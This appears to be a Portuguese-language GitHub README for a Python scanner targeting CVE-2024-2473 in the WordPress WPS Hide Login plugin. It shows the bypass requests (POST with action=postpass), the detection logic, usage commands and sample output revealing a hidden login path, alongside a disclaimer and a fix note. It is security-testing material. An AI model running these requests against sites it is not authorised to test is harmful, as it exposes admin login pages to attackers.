
Divulgação da Página de Login Oculta do WordPress. Detecte a Divulgação da Página de Login em sites WordPress que executam o WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)
Um scanner Python profissional para detectar a Exposição da Página de Login em sites WordPress que executam o WPS Hide Login ≤ 1.9.15.2
Codificado por Venexy
WPS Hide Login é um plugin WordPress popular que permite aos administradores alterar a URL padrão /wp-login.php para um caminho personalizado e oculto — funcionando como segurança por obscuridade.
Este scanner detecta a CVE-2024-2473, uma vulnerabilidade em que o parâmetro action=postpass pode ser fornecido para contornar completamente o mecanismo de proteção do plugin, expondo a URL da página de login oculta a atacantes não autenticados.
O plugin WPS Hide Login move a página de login do WordPress da URL padrão /wp-login.php para uma URL personalizada escolhida pelo administrador. No entanto, em todas as versões até 1.9.15.2 inclusive, fornecer o parâmetro de consulta action=postpass para /wp-login.php ou /wp-admin/ contorna essa proteção, revelando a URL de ação real do formulário de login oculto — expondo efetivamente o caminho de login secreto a qualquer atacante não autenticado.
O scanner replica o fluxo de ataque da vulnerabilidade em três fases:
Phase 1 ─► Confirm target is a WordPress installation
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
│
Phase 2b ─► POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
│
▼
Report hidden login URL if discovered
Se a Fase 2a ou a Fase 2b corresponder, o alvo é sinalizado como vulnerável.
requests1. Clone o repositório
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. Instale as dependências
pip install requests
Nota: Em sistemas que usam ambientes virtuais Python ou Kali Linux, você pode precisar de:
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| Argumento | Descrição | Padrão |
|---|---|---|
-u, --url |
# Basic scan
python CVE-2024-2473.py -u https://example.com
# Scan with custom timeout
python CVE-2024-2473.py -u https://example.com --timeout 15
# Scan over HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Sempre obtenha permissão explícita por escrito do proprietário do sistema de destino antes de realizar qualquer avaliação de segurança. A varredura ou exploração não autorizada de sistemas é ilegal e antiética.
Use com responsabilidade.
Codificado com ❤️ por Venexy
Se esta ferramenta ajudou você, considere dar uma ⭐🌟🌟🌟 ao repositório
| Campo | Detalhes |
|---|
| ID CVE | CVE-2024-2473 |
| Afetado | Plugin WPS Hide Login ≤ 1.9.15.2 para WordPress |
| Severidade | Média |
| Pontuação CVSS | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — Exposição de Informações Sensíveis |
| Pontuação EPSS | 0.10433 (93º percentil) |
| Autenticação Necessária | Nenhuma |
| Fornecedor | WPServeur |
| Correção | Atualizar o plugin para a versão > 1.9.15.2 |
| URL base do WordPress de destino (obrigatório) |
| — |
-t, --timeout | Tempo limite (timeout) da solicitação HTTP em segundos | 10 |
| Recurso | Link |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Comunicado da Wordfence | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| Plugin WPS Hide Login | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| Calculadora CVSS 3.1 | https://www.first.org/cvss/calculator/3.1 |